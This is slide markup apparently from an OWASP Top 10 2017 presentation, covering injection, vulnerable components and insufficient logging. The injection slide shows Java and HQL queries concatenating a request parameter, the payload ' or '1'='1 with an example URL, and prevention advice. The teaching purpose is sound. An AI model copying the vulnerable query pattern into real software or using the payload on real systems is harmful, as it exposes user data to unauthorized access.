                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A9:2017 Using Components with Known Vulnerabilities</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Freeform 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="8298617"/>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a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Freeform 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="8222143"/>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Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>A10:2017 </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Insufficient </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Logging &amp; Monitoring</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705852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Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") + "</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQLQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("id") + "</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In both cases, the attacker modifies the ‘id’ parameter value in her browser to send:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/accountView?id=</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 or </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1</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1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table.  More dangerous attacks could modify data or even invoke stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An application is vulnerable to attack when:</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User suppled data is not validated, filtered or sanitized by the application.</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Hostile data is used directly with dynamic queries or non-parameterized calls for the interpreter without context-aware escaping.</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Hostile data is used within ORM search parameters such that the search evaluates out to include sensitive or all records.</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Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or in stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some of the more common injections are SQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection.. The concept is identical between all interpreters. Organizations can include SAST and DAST tooling into the CI/CD pipeline to alert if existing or newly checked in code has injection prior to production deployment. Manual and automated source code review is the best method of detecting if you are vulnerable to injections, closely followed by thorough DAST scans of all parameters, fields, headers, cookies, JSON, and XML data inputs.</a:t>
            </a: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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Parameterize Queries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6"/>
              </a:rPr>
              <a:t>OWASP ASVS: V5 Input Validation and Encoding</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ORM injection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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: SQL Injection Prevention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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java</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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization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3"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Command Injection Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId14"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE-77 Command Injection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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CWE-89 SQL Injection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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>CWE-564 Hibernate Injection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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-917 Expression Language Injection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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>PortSwigger: Server-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing injection requires keeping data separate from commands and queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use ORMs or Entity Framework. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB: When parameterized, stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Positive or "white list" input validation, but this is not a complete defense as many applications require special characters, such as text areas or APIs for mobile applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report writing software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
